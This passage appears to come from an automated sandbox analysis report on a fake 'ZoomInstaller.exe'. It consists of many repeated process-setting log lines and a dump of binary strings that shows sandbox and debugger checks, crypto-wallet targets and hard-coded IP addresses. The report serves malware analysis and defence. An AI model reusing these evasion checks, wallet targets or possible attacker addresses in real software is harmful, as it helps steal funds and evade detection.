    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: ZoomInstaller.exeBinary or memory string: SCHED={PC:, GP->STATUS= PLUGINPATH= : UNKNOWN PC CALLED FROM RUNTIME: PID=LEVEL 3 RESETSRMOUNT ERRORTIMER EXPIREDEXCHANGE FULLREGENUMKEYEXWREGOPENKEYEXWCERTOPENSTOREFINDNEXTFILEWMAPVIEWOFFILEVIRTUALUNLOCKWRITECONSOLEWFREEADDRINFOWGETHOSTBYNAMEGETSERVBYNAMEPARSING TIME OUT OF RANGE IS TOO LARGENOT AVAILABLEDALTLDPSUGCT?3814697265625GETTEMPPATH2WMODULE32NEXTWRTLGETVERSIONREGENUMVALUEWIMAGELIST_ADDCREATERECTRGNGETDEVICECAPSSETBRUSHORGEXCREATEACTCTXWFINDRESOURCEWRTLMOVEMEMORYCOTASKMEMFREEOLEINITIALIZESYSFREESTRINGWGLSHARELISTSPDHCLOSEQUERYSHELLEXECUTEWANIMATEWINDOWDESTROYWINDOWDRAWFOCUSRECTGETCLASSNAMEWGETCLIENTRECTGETMENUITEMIDGETSCROLLINFOGETSYSTEMMENUGETWINDOWRECTOPENCLIPBOARDSETSCROLLINFOGETTHEMECOLOROPENTHEMEDATAENUMPRINTERSWNAME TOO LONGTLSMAXRSASIZEACCESS DENIEDUSER CANCELEDPKCS1WITHSHA1ECDSAWITHSHA1CLIENT_RANDOMGZIP, DEFLATEGOCACHEVERIFYINSTALLGOROOTHTML/TEMPLATEREGDELETEKEYWDELETESERVICESTARTSERVICEWGETDRIVETYPEWTHREAD32FIRSTWAITCOMMEVENTRTLINITSTRINGENUMPROCESSESEXITWINDOWSEXTIMEENDPERIODWTSFREEMEMORYINVALID ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSEMAIL ADDRESSSHARED_SECRETEMPTY INTEGERUNSUPPORTED: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228TVAUENRRRAOKWAVMWARE SVGA 3DVMWAREUSER.EXEXENSERVICE.EXEVMWARETRAY.EXECHROME DEFAULTYANDEX DEFAULTCOCCOC DEFAULTIS A DIRECTORY_SECURE_DELETEUNEXPECTED EOFINTERNAL ERRORGETPROTOBYNAMEUNKNOWN MODE: CONTENT-LENGTHMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%DACCEPT-CHARSETCONTENT-LENGTHREAD_FRAME_EOFUNKNOWN ERROR UNKNOWN CODE: NOT ACCEPTABLECOMPUTERNAMEEX
    Source: ZoomInstaller.exeBinary or memory string: MOREBUF={PC:: NO FRAME (SP=RUNTIME: FRAME TS SET IN TIMERTRACEBACK STUCKADVERTISE ERRORKEY HAS EXPIREDNETWORK IS DOWNNO MEDIUM FOUNDNO SUCH PROCESSGETADAPTERSINFOCREATEHARDLINKWDEVICEIOCONTROLFLUSHVIEWOFFILEGETCOMMANDLINEWGETSTARTUPINFOWPROCESS32FIRSTWUNMAPVIEWOFFILEFAILED TO LOAD FAILED TO FIND : CANNOT PARSE ,M3.2.0,M11.1.0476837158203125IMPERSONATESELFOPENTHREADTOKENINVALID ARGSIZE<INVALID VALUE>REFLECTLITE.SETEXCLUDECLIPRECTGETENHMETAFILEWGETTEXTMETRICSWPLAYENHMETAFILEGDIPLUSSHUTDOWNGETTHREADLOCALEOLEUNINITIALIZEWGLGETCURRENTDCDRAGACCEPTFILESCALLWINDOWPROCWCREATEPOPUPMENUCREATEWINDOWEXWDIALOGBOXPARAMWGETACTIVEWINDOWGETDPIFORWINDOWGETRAWINPUTDATAINSERTMENUITEMWISWINDOWENABLEDISWINDOWVISIBLEPOSTQUITMESSAGESETACTIVEWINDOWSETWINEVENTHOOKTRACKMOUSEEVENTWINDOWFROMPOINTDRAWTHEMETEXTEXACCEPT-LANGUAGEX-FORWARDED-FOR()<>@,;:\"/[]?=INVALID POINTERX509KEYPAIRLEAFRECORD OVERFLOWBAD CERTIFICATEPKCS1WITHSHA256PKCS1WITHSHA384PKCS1WITHSHA512CLIENTAUTHTYPE(UNKNOWN VERSIONJSTMPLLITINTERPTARINSECUREPATHX509USEPOLICIESREGCREATEKEYEXWREGDELETEVALUEW IS UNAVAILABLEGETSECURITYINFOSETSECURITYINFOADDDLLDIRECTORYFINDNEXTVOLUMEWFINDVOLUMECLOSEGETCOMMTIMEOUTSISWOW64PROCESS2QUERYDOSDEVICEWSETCOMMTIMEOUTSSETVOLUMELABELWRTLDEFAULTNPACLCLSIDFROMSTRINGSTRINGFROMGUID2ISWINDOWUNICODETIMEBEGINPERIOD0601021504Z0700INVALID BOOLEANNON-MINIMAL TAGUNKNOWN GO TYPEAVX512VPOPCNTDQHTTP TOOLKIT.EXEJOEBOXSERVER.EXE0123456789ABCDEFREAD AFTER CLOSEAFTER OBJECT KEYGETDESKTOPWINDOW2006-01-02 15:042006-01-02T15:04STRING TOO LARGE_WRITABLE_SCHEMAAUTH_USER_CHANGEAUTH_USER_DELETEDIVISION BY ZERO()<>@,;:\"/[]?= HOSTLOOKUPORDER=/ETC/RESOLV.CONFNON-IPV4 ADDRESSNON-IPV6 ADDRESSUNKNOWN NETWORK NO COLON ON LINESETTINGS_TIMEOUTFRAME_SIZE_ERRORCONTENT-ENCODINGCONTENT-ENCODINGCONTENT-LANGUAGECONTENT-LOCATIONWWW-AUTHENTICATEPROXY-CONNECTIONREAD_FRAME_OTHER%S %S HTTP/1.1
    Source: ZoomInstaller.exeBinary or memory string: HANDSHAKEMATH/RANDWINMM.DLLPURGECOMMSETUPCOMMINFO_HASHQ9IATRKPRHQARZHRDBPJD1BNJKFVLHPXMDUOPVYXX64DBG.EXEX96DBG.EXEVMSRVC.EXEX32DBG.EXEPRL_CC.EXECHROME.EXEMSEDGE.EXEMOTDEPASSEPASSPHRASESAUVEGARDEMATHWALLETEVERWALLETPETRAAPTOSFEWCHAMOVEPALIWALLETMETAMASK_EMETAMASK_O FOR TYPE USER32.DLL2006-01-02_AUTH_USER_AUTH_PASS_AUTH_SALTIMPOSSIBLE
    Source: ZoomInstaller.exeBinary or memory string: INVALID EXCHANGENO ROUTE TO HOSTINVALID ARGUMENTMESSAGE TOO LONGOBJECT IS REMOTEREMOTE I/O ERRORSETFILEPOINTEREXOPENPROCESSTOKENREGQUERYINFOKEYWREGQUERYVALUEEXWDNSNAMECOMPARE_WCREATEDIRECTORYWFLUSHFILEBUFFERSGETCOMPUTERNAMEWGETFULLPATHNAMEWGETLONGPATHNAMEWREMOVEDIRECTORYWNETAPIBUFFERFREETIME: BAD [0-9]*2384185791015625GODEBUG: VALUE "DUPLICATETOKENEXGETCURRENTTHREADRTLVIRTUALUNWIND: VALUE OF TYPE CONTEXT CANCELEDIMAGELIST_CREATEIMAGELIST_DRAWEXGETOPENFILENAMEWGETSAVEFILENAMEWCLOSEENHMETAFILECOPYENHMETAFILEWCREATEDIBSECTIONGETVIEWPORTORGEXSETVIEWPORTORGEXGDIPDISPOSEIMAGEGETCONSOLETITLEWGETCONSOLEWINDOWGETMODULEHANDLEWGETNUMBERFORMATWCOCREATEINSTANCECOGETCLASSOBJECTWGLCREATECONTEXTWGLDELETECONTEXTPDHVALIDATEPATHWADJUSTWINDOWRECTBRINGWINDOWTOTOPDISPATCHMESSAGEWENUMCHILDWINDOWSGETCLIPBOARDDATAGETMENUITEMCOUNTGETMENUITEMINFOWGETSYSCOLORBRUSHGETSYSTEMMETRICSISDIALOGMESSAGEWUNREGISTERCLASSWREGISTERCLASSEXWSETCLIPBOARDDATASETMENUITEMINFOWTRACKPOPUPMENUEXTRANSLATEMESSAGEGETTHEMEPARTSIZECONTENT-LANGUAGEINVALID DNS NAMERCODEFORMATERRORUNPACKING HEADERNO RENEGOTIATIONSIGNATURESCHEME(INVALID ENCODINGSETENTRIESINACLWSETSERVICESTATUSCRYPTPROTECTDATACRYPTQUERYOBJECTCONNECTNAMEDPIPECREATEJOBOBJECTWCREATENAMEDPIPEWDEFINEDOSDEVICEWFINDFIRSTVOLUMEWGETLOGICALDRIVESGETNAMEDPIPEINFOGETPRIORITYCLASSSETDLLDIRECTORYWSETFILEVALIDDATASETPRIORITYCLASSVIRTUALPROTECTEXRTLGETCURRENTPEBGETGUITHREADINFOWINVERIFYTRUSTEXLENGTH TOO LARGEAVX512VPCLMULQDQFIDDLER.WEBUI.EXEVGAUTHSERVICE.EXEPROCESSHACKER.EXEJOEBOXCONTROL.EXEWRITE AFTER CLOSEREFLECT.VALUE.INTIN STRING LITERAL0123456789ABCDEFX0123456789ABCDEFX%%!%C(BIG.INT=%S)MULTIPARTMAXPARTSMESSAGE TOO LARGEINVALID STREAM IDTRANSFER-ENCODINGHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIF-MODIFIED-SINCEFRAME_PING_LENGTHTRUNCATED HEADERSIF-MODIFIED-SINCETRANSFER-ENCODINGX-FORWARDED-PROTOX-IDEMPOTENCY-KEYMOVED PERMANENTLYFAILED DEPENDENCYTOO MANY REQUESTSWINREADLINKVOLUMEEXEC: KILLING CMDEXEC: NOT STARTEDGOROUTINE PROFILEALLTHREADSSYSCALLGC ASSIST MARKINGSELECT (NO CASES)SYNC.RWMUTEX.LOCKWAIT FOR GC CYCLETRACE PROC STATUSSYNC.(*COND).WAIT: MISSING METHOD NOTETSLEEPG ON G0BAD TINYSIZECLASSKEY ALIGN TOO BIGRUNTIME: POINTER G ALREADY SCANNEDMARK - BAD STATUSSCANOBJECT N == 0SWEPT CACHED SPANMARKBITS OVERFLOWRUNTIME: SUMMARY[RUNTIME: LEVEL = , P.SEARCHADDR = RTLGETCURRENTPEBRUNTIME.NEWOSPROCRUNTIME/INTERNAL/THREAD EXHAUSTIONLOCKED M0 WOKE UPENTERSYSCALLBLOCK SPINNINGTHREADS=GP.WAITING != NILUNKNOWN CALLER PCSTACK: FRAME={SP:RUNTIME: NAMEOFF RUNTIME: TYPEOFF RUNTIME: TEXTOFF PERMISSION DENIEDWRONG MEDIUM TYPENO DATA AVAILABLEEXEC FORMAT ERRORLOOKUPACCOUNTSIDWDNSRECORDLISTFREEGETCURRENTPROCESSGETSHORTPATHNAMEWWSAENUMPROTOCOLSWGTB STANDARD TIMEFLE STANDARD TIMEGMT STANDARD TIMECORRUPT ZIP FILE FRACTIONAL SECONDINDEX > WINDOWEND1192092895507812559604644775390625INVALID BIT SIZE UNKNOWN TYPE KIND HAS INVALID NAMEREFLECT: CALL OF REFLECT.VALUE.LENREFLECT: NEW(NIL)IMAGELIST_DESTROYCHOOSEPIXELFORMATDELETEENHMETAFILEINTERSECTCLIPR
    Source: ZoomInstaller.exeBinary or memory string: RUNQUEUE= STOPWAIT= RUNQSIZE= GFREECNT= THROWING= SPINNING=ATOMICAND8FLOAT64NANFLOAT32NANEXCEPTION PTRSIZE= TARGETPC= UNTIL PC=UNKNOWN PCRUNTIME: GGOROUTINE TERMINATEDOWNER DIEDDNSQUERY_WGETIFENTRYCANCELIOEXCREATEPIPEGETVERSIONWSACLEANUPWSASTARTUPGETSOCKOPTDNSAPI.DLLWS2_32.DLL%!WEEKDAY(SHORT READ12207031256103515625PARSEFLOATLOCKFILEEXWSASOCKETWCOMPLEX128T.KIND == COMBINERGNGETBKCOLORGETOBJECTWSETBKCOLORSTRETCHBLTALPHABLENDGLOBALFREEGLOBALLOCKDRAGFINISHBEGINPAINTCREATEMENUDELETEMENUDRAWICONEXGETDLGITEMGETSUBMENULOADIMAGEWMOVEWINDOWREMOVEMENUSETCAPTURESHOWWINDOWCONTENT-IDMESSAGE-IDPARSEADDR(INVALID IPCLASSCSNETCLASSCHAOSADDITIONALSKIPPING: RES BINDERRES MASTERRESUMPTIONEXP 